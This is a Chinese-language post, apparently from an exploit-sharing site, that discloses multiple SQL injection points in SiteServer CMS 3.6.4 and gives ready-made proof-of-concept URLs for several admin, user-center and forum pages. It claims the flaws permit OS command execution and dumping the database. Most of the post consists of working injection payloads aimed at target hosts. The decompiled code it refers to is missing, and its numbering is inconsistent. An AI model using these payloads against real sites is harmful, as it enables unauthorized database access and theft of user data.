siteserver最新版3.6.4 sql inject

1.
http://0day5.com/siteserver/service/background_taskLog.aspx?Keyword=test%’ and @@version=1 and 2=’1&DateFrom=&DateTo=&IsSuccess=All

注入点存在于Keyword中,完全没有任何过滤。各种SQL注入类型,可以执行os cmd,脱裤

2.第二个注入存在siteserver/platform/background_log.aspx

用.NET Reflector 反编译BaiRong.BackgroundPages.dll这个文件
查看代码如下:

所有的参数都没有进行有效的过滤
漏洞证明:
http://www.target.com/siteserver/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101’%20and%20@@version=1%20and%201=’test&DateTo=test

3.第三个注入存在usercenter/platform/user.aspx
用.NET Reflector 反编译UserCenter.Pages.dll这个文件
查看代码如下:

Lock不为空即可,UserNameCollection就带入了UserDataProvider.UserDAO.Lock函数内

UserNameCollection没有进行有效的过滤
http://www.target.com/usercenter/platform/user.aspx?UnLock=sdfe’&UserNameCollection=test’)%20and%20@@version=2;%20–

3.第七个注入存在/UserCenter/cms/contents.aspx
用.NET Reflector 反编译UserCenter.Pages.dll这个文件
查看代码如下:

关注keyword

很明显的注入
漏洞证明:
因为这次是post类型,server会对viewstate进行check,所以需要注册一个会员,登录后访问
http://www.target.com/UserCenter/cms/contents.aspx?PublishmentSystemID=1
在关键字处填写

4.http://www.target.com/siteserver/bbs/background_thread.aspx?UserName=test&Title=’%20and%201=@@version%20and%201=’&DateFrom=&DateTo=&ForumID=0

http://www.target.com/siteserver/bbs/background_post.aspx?UserName=&Title=’%20and%20%201=@@version%20and%201=’1&DateFrom=&DateTo=&ForumID=0

http://www.target.com/siteserver/bbs/background_user.aspx?UserGroup=7&PageNum=0&Keyword=’%20and%201=@@version%20and%201=’&CreationDate=0&LastActivityDate=0

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录